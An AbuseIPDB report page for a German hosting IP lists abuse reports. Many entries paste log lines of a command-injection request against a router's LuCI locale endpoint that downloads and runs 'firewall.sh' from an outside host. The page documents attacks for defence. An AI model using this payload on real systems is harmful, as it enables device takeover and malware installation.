JavaScript is disabled. Some features of this site may not work properly. For a smoother experience, please enable JavaScript in your browser settings.

AbuseIPDB » 85.14.248.164

85.14.248.164 was found in our database!

This IP was reported 97 times. Confidence of Abuse is 0%: ?

ISP	WIIT AG
Usage Type	Data Center/Web Hosting/Transit
ASN	AS24961
Domain Name	wiit.cloud
Country	🇩🇪 Germany
City	Ratingen, North Rhine-Westphalia

IP info including ISP, Usage Type, and Location provided by IPInfo. Updated weekly.

Report 85.14.248.164

Whois 85.14.248.164

IP Abuse Reports for 85.14.248.164:

This IP address has been reported a total of 97 times from 69 distinct sources. 85.14.248.164 was first reported on August 29th 2023, and the most recent report was 1 year ago.

Old Reports: The most recent abuse report for this IP address is from 1 year ago . It is possible that this IP is no longer involved in abusive activities.

Reporter	IoA Timestamp (UTC)	Comment	Categories
🇳🇱 Linuxmalwarehuntingnl	2024-07-01 10:55:36 (1 year ago)	Unauthorized connection attempt	Brute-Force
🇺🇸 spaceduck	2024-05-11 19:10:49 (2 years ago)	85.14.248.164 - - [07/Oct/2023:16:25:53 -0700] "GET /cgi-bin/luci/;stok=/locale?form=country&operati ... show more 85.14.248.164 - - [07/Oct/2023:16:25:53 -0700] "GET /cgi-bin/luci/;stok=/locale?form=country&operation=write&country=$(cd%20/tmp%3Brm%20firewall.sh%3Bwget%20http%3A//199.19.75.141%3A8091/firewall.sh%3Bbusybox%20wget%20http%3A//199.19.75.141%3A8091/firewall.sh%3Bchmod%20777%20firewall.sh%3Bsh%20firewall.sh%3Brm%20firewall.sh) HTTP/1.1" 404 555 "-" "Mozilla/5.0 (Windows NT 5.1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/52.0.2777.46 Safari/537.36" 85.14.248.164 - - [07/Oct/2023:16:25:54 -0700] "GET /cgi-bin/luci/;stok=/locale?form=country&operation=write&country=$(cd%20/tmp%3Brm%20firewall.sh%3Bwget%20http%3A//199.19.75.141%3A8091/firewall.sh%3Bbusybox%20wget%20http%3A//199.19.75.141%3A8091/firewall.sh%3Bchmod%20777%20firewall.sh%3Bsh%20firewall.sh%3Brm%20firewall.sh) HTTP/1.1" 404 555 "-" "Mozilla/5.0 (Windows NT 5.1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/52.0.2777.46 Safari/537.36" show less	Bad Web Bot Web App Attack
🇺🇸 spaceduck	2024-04-18 13:48:32 (2 years ago)	85.14.248.164 - - [07/Oct/2023:16:25:53 -0700] "GET /cgi-bin/luci/;stok=/locale?form=country&operati ... show more 85.14.248.164 - - [07/Oct/2023:16:25:53 -0700] "GET /cgi-bin/luci/;stok=/locale?form=country&operation=write&country=$(cd%20/tmp%3Brm%20firewall.sh%3Bwget%20http%3A//199.19.75.141%3A8091/firewall.sh%3Bbusybox%20wget%20http%3A//199.19.75.141%3A8091/firewall.sh%3Bchmod%20777%20firewall.sh%3Bsh%20firewall.sh%3Brm%20firewall.sh) HTTP/1.1" 404 555 "-" "Mozilla/5.0 (Windows NT 5.1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/52.0.2777.46 Safari/537.36" 85.14.248.164 - - [07/Oct/2023:16:25:54 -0700] "GET /cgi-bin/luci/;stok=/locale?form=country&operation=write&country=$(cd%20/tmp%3Brm%20firewall.sh%3Bwget%20http%3A//199.19.75.141%3A8091/firewall.sh%3Bbusybox%20wget%20http%3A//199.19.75.141%3A8091/firewall.sh%3Bchmod%20777%20firewall.sh%3Bsh%20firewall.sh%3Brm%20firewall.sh) HTTP/1.1" 404 555 "-" "Mozilla/5.0 (Windows NT 5.1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/52.0.2777.46 Safari/537.36" show less	Bad Web Bot Web App Attack
🇺🇸 spaceduck	2024-03-09 17:53:43 (2 years ago)	85.14.248.164 - - [07/Oct/2023:16:25:53 -0700] "GET /cgi-bin/luci/;stok=/locale?form=country&operati ... show more 85.14.248.164 - - [07/Oct/2023:16:25:53 -0700] "GET /cgi-bin/luci/;stok=/locale?form=country&operation=write&country=$(cd%20/tmp%3Brm%20firewall.sh%3Bwget%20http%3A//199.19.75.141%3A8091/firewall.sh%3Bbusybox%20wget%20http%3A//199.19.75.141%3A8091/firewall.sh%3Bchmod%20777%20firewall.sh%3Bsh%20firewall.sh%3Brm%20firewall.sh) HTTP/1.1" 404 555 "-" "Mozilla/5.0 (Windows NT 5.1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/52.0.2777.46 Safari/537.36" 85.14.248.164 - - [07/Oct/2023:16:25:54 -0700] "GET /cgi-bin/luci/;stok=/locale?form=country&operation=write&country=$(cd%20/tmp%3Brm%20firewall.sh%3Bwget%20http%3A//199.19.75.141%3A8091/firewall.sh%3Bbusybox%20wget%20http%3A//199.19.75.141%3A8091/firewall.sh%3Bchmod%20777%20firewall.sh%3Bsh%20firewall.sh%3Brm%20firewall.sh) HTTP/1.1" 404 555 "-" "Mozilla/5.0 (Windows NT 5.1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/52.0.2777.46 Safari/537.36" show less	Bad Web Bot Web App Attack
🇺🇸 spaceduck	2024-02-16 18:14:49 (2 years ago)	85.14.248.164 - - [07/Oct/2023:16:25:53 -0700] "GET /cgi-bin/luci/;stok=/locale?form=country&operati ... show more 85.14.248.164 - - [07/Oct/2023:16:25:53 -0700] "GET /cgi-bin/luci/;stok=/locale?form=country&operation=write&country=$(cd%20/tmp%3Brm%20firewall.sh%3Bwget%20http%3A//199.19.75.141%3A8091/firewall.sh%3Bbusybox%20wget%20http%3A//199.19.75.141%3A8091/firewall.sh%3Bchmod%20777%20firewall.sh%3Bsh%20firewall.sh%3Brm%20firewall.sh) HTTP/1.1" 404 555 "-" "Mozilla/5.0 (Windows NT 5.1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/52.0.2777.46 Safari/537.36" 85.14.248.164 - - [07/Oct/2023:16:25:54 -0700] "GET /cgi-bin/luci/;stok=/locale?form=country&operation=write&country=$(cd%20/tmp%3Brm%20firewall.sh%3Bwget%20http%3A//199.19.75.141%3A8091/firewall.sh%3Bbusybox%20wget%20http%3A//199.19.75.141%3A8091/firewall.sh%3Bchmod%20777%20firewall.sh%3Bsh%20firewall.sh%3Brm%20firewall.sh) HTTP/1.1" 404 555 "-" "Mozilla/5.0 (Windows NT 5.1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/52.0.2777.46 Safari/537.36" show less	Bad Web Bot Web App Attack
🇺🇸 spaceduck	2024-01-04 05:39:16 (2 years ago)	85.14.248.164 - - [07/Oct/2023:16:25:53 -0700] "GET /cgi-bin/luci/;stok=/locale?form=country&operati ... show more 85.14.248.164 - - [07/Oct/2023:16:25:53 -0700] "GET /cgi-bin/luci/;stok=/locale?form=country&operation=write&country=$(cd%20/tmp%3Brm%20firewall.sh%3Bwget%20http%3A//199.19.75.141%3A8091/firewall.sh%3Bbusybox%20wget%20http%3A//199.19.75.141%3A8091/firewall.sh%3Bchmod%20777%20firewall.sh%3Bsh%20firewall.sh%3Brm%20firewall.sh) HTTP/1.1" 404 555 "-" "Mozilla/5.0 (Windows NT 5.1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/52.0.2777.46 Safari/537.36" 85.14.248.164 - - [07/Oct/2023:16:25:54 -0700] "GET /cgi-bin/luci/;stok=/locale?form=country&operation=write&country=$(cd%20/tmp%3Brm%20firewall.sh%3Bwget%20http%3A//199.19.75.141%3A8091/firewall.sh%3Bbusybox%20wget%20http%3A//199.19.75.141%3A8091/firewall.sh%3Bchmod%20777%20firewall.sh%3Bsh%20firewall.sh%3Brm%20firewall.sh) HTTP/1.1" 404 555 "-" "Mozilla/5.0 (Windows NT 5.1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/52.0.2777.46 Safari/537.36" show less	Bad Web Bot Web App Attack
🇺🇸 spaceduck	2023-12-22 16:26:20 (2 years ago)	85.14.248.164 - - [07/Oct/2023:16:25:53 -0700] "GET /cgi-bin/luci/;stok=/locale?form=country&operati ... show more 85.14.248.164 - - [07/Oct/2023:16:25:53 -0700] "GET /cgi-bin/luci/;stok=/locale?form=country&operation=write&country=$(cd%20/tmp%3Brm%20firewall.sh%3Bwget%20http%3A//199.19.75.141%3A8091/firewall.sh%3Bbusybox%20wget%20http%3A//199.19.75.141%3A8091/firewall.sh%3Bchmod%20777%20firewall.sh%3Bsh%20firewall.sh%3Brm%20firewall.sh) HTTP/1.1" 404 555 "-" "Mozilla/5.0 (Windows NT 5.1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/52.0.2777.46 Safari/537.36" 85.14.248.164 - - [07/Oct/2023:16:25:54 -0700] "GET /cgi-bin/luci/;stok=/locale?form=country&operation=write&country=$(cd%20/tmp%3Brm%20firewall.sh%3Bwget%20http%3A//199.19.75.141%3A8091/firewall.sh%3Bbusybox%20wget%20http%3A//199.19.75.141%3A8091/firewall.sh%3Bchmod%20777%20firewall.sh%3Bsh%20firewall.sh%3Brm%20firewall.sh) HTTP/1.1" 404 555 "-" "Mozilla/5.0 (Windows NT 5.1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/52.0.2777.46 Safari/537.36" show less	Bad Web Bot Web App Attack
🇺🇸 spaceduck	2023-12-16 19:02:24 (2 years ago)	85.14.248.164 - - [07/Oct/2023:16:25:53 -0700] "GET /cgi-bin/luci/;stok=/locale?form=country&operati ... show more 85.14.248.164 - - [07/Oct/2023:16:25:53 -0700] "GET /cgi-bin/luci/;stok=/locale?form=country&operation=write&country=$(cd%20/tmp%3Brm%20firewall.sh%3Bwget%20http%3A//199.19.75.141%3A8091/firewall.sh%3Bbusybox%20wget%20http%3A//199.19.75.141%3A8091/firewall.sh%3Bchmod%20777%20firewall.sh%3Bsh%20firewall.sh%3Brm%20firewall.sh) HTTP/1.1" 404 555 "-" "Mozilla/5.0 (Windows NT 5.1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/52.0.2777.46 Safari/537.36" 85.14.248.164 - - [07/Oct/2023:16:25:54 -0700] "GET /cgi-bin/luci/;stok=/locale?form=country&operation=write&country=$(cd%20/tmp%3Brm%20firewall.sh%3Bwget%20http%3A//199.19.75.141%3A8091/firewall.sh%3Bbusybox%20wget%20http%3A//199.19.75.141%3A8091/firewall.sh%3Bchmod%20777%20firewall.sh%3Bsh%20firewall.sh%3Brm%20firewall.sh) HTTP/1.1" 404 555 "-" "Mozilla/5.0 (Windows NT 5.1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/52.0.2777.46 Safari/537.36" show less	Bad Web Bot Web App Attack
🇺🇸 spaceduck	2023-11-23 07:21:02 (2 years ago)	85.14.248.164 - - [07/Oct/2023:16:25:53 -0700] "GET /cgi-bin/luci/;stok=/locale?form=country&operati ... show more 85.14.248.164 - - [07/Oct/2023:16:25:53 -0700] "GET /cgi-bin/luci/;stok=/locale?form=country&operation=write&country=$(cd%20/tmp%3Brm%20firewall.sh%3Bwget%20http%3A//199.19.75.141%3A8091/firewall.sh%3Bbusybox%20wget%20http%3A//199.19.75.141%3A8091/firewall.sh%3Bchmod%20777%20firewall.sh%3Bsh%20firewall.sh%3Brm%20firewall.sh) HTTP/1.1" 404 555 "-" "Mozilla/5.0 (Windows NT 5.1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/52.0.2777.46 Safari/537.36" 85.14.248.164 - - [07/Oct/2023:16:25:54 -0700] "GET /cgi-bin/luci/;stok=/locale?form=country&operation=write&country=$(cd%20/tmp%3Brm%20firewall.sh%3Bwget%20http%3A//199.19.75.141%3A8091/firewall.sh%3Bbusybox%20wget%20http%3A//199.19.75.141%3A8091/firewall.sh%3Bchmod%20777%20firewall.sh%3Bsh%20firewall.sh%3Brm%20firewall.sh) HTTP/1.1" 404 555 "-" "Mozilla/5.0 (Windows NT 5.1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/52.0.2777.46 Safari/537.36" show less	Bad Web Bot Web App Attack
🇺🇸 spaceduck	2023-10-16 01:17:02 (2 years ago)	85.14.248.164 - - [07/Oct/2023:16:25:53 -0700] "GET /cgi-bin/luci/;stok=/locale?form=country&operati ... show more 85.14.248.164 - - [07/Oct/2023:16:25:53 -0700] "GET /cgi-bin/luci/;stok=/locale?form=country&operation=write&country=$(cd%20/tmp%3Brm%20firewall.sh%3Bwget%20http%3A//199.19.75.141%3A8091/firewall.sh%3Bbusybox%20wget%20http%3A//199.19.75.141%3A8091/firewall.sh%3Bchmod%20777%20firewall.sh%3Bsh%20firewall.sh%3Brm%20firewall.sh) HTTP/1.1" 404 555 "-" "Mozilla/5.0 (Windows NT 5.1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/52.0.2777.46 Safari/537.36" 85.14.248.164 - - [07/Oct/2023:16:25:54 -0700] "GET /cgi-bin/luci/;stok=/locale?form=country&operation=write&country=$(cd%20/tmp%3Brm%20firewall.sh%3Bwget%20http%3A//199.19.75.141%3A8091/firewall.sh%3Bbusybox%20wget%20http%3A//199.19.75.141%3A8091/firewall.sh%3Bchmod%20777%20firewall.sh%3Bsh%20firewall.sh%3Brm%20firewall.sh) HTTP/1.1" 404 555 "-" "Mozilla/5.0 (Windows NT 5.1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/52.0.2777.46 Safari/537.36" show less	Bad Web Bot Web App Attack
🇫🇷 Sipherion	2023-10-11 09:43:37 (2 years ago)	ModSecurity 10 alerts from KEMP	Web App Attack
🇧🇪 hctel	2023-10-10 18:53:32 (2 years ago)	85.14.248.164 - - [08/Oct/2023:01:55:51 +0200] "GET /cgi-bin/luci/;stok=/locale?form=country&operati ... show more 85.14.248.164 - - [08/Oct/2023:01:55:51 +0200] "GET /cgi-bin/luci/;stok=/locale?form=country&operation=write&country=$(cd%20/tmp%3Brm%20firewall.sh%3Bwget%20http%3A//199.19.75.141%3A8091/firewall.sh%3Bbusybox%20wget%20http%3A//199.19.75.141%3A8091/firewall.sh%3Bchmod%20777%20firewall.sh%3Bsh%20firewall.sh%3Brm%20firewall.sh) HTTP/1.1" 404 4743 "-" "Mozilla/5.0 (Windows NT 5.1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/52.0.2777.46 Safari/537.36" show less	Brute-Force Web App Attack
Anonymous	2023-10-10 09:25:27 (2 years ago)	-	Port Scan
🇫🇷 jk jk	2023-10-09 17:59:00 (2 years ago)	WAF_blocked	Hacking Web App Attack
🇩🇪 MaGGs	2023-10-09 07:26:59 (2 years ago)	HTTP header IPS match Source IP: 85.14.248.164 Source Port: 34382 Destination IP: 192.168.178.xxx De ... show more HTTP header IPS match Source IP: 85.14.248.164 Source Port: 34382 Destination IP: 192.168.178.xxx Destination Port: 443 reason: IPS detected signature_id: 1133253 severity: 5 signature_name: WEB Remote Command Execution via Shell Script -1.h signature_cat: Exploits sig_vers: 18.284 host: 92.116.117.104 path: /cgi-bin/luci/;stok=/locale?form=country&operation=write&country=$(cd%20/tmp%3Brm%20firewall.sh%3Bwget%20http%3A//199.19.75.141% show less	Hacking Brute-Force Web App Attack

Showing 1 to 15 of 97 reports

Think this IP has been falsely reported? You may request to have the associated reports reviewed and removed. Request Takedown 🚩

Recently Reported IPs:

🇵🇰 154.208.47.121

🇨🇳 211.149.227.24

🇩🇪 162.158.111.14

🇺🇸 66.42.108.5

🇺🇸 2001:470:1:fb5::1ac

🇹🇷 213.128.70.19

🇺🇸 172.208.48.177

🇺🇸 172.71.254.215

🇺🇸 172.56.167.98

🇮🇩 143.20.49.38

🇷🇴 141.98.83.240

🇳🇱 89.21.67.179

🇺🇸 20.65.193.137

🇷🇴 2.57.122.177

🇨🇳 220.196.248.126

🇰🇷 211.223.107.86

🇺🇸 205.210.31.80

🇲🇲 202.165.90.22

🇬🇧 193.163.125.85

🇮🇹 188.241.67.19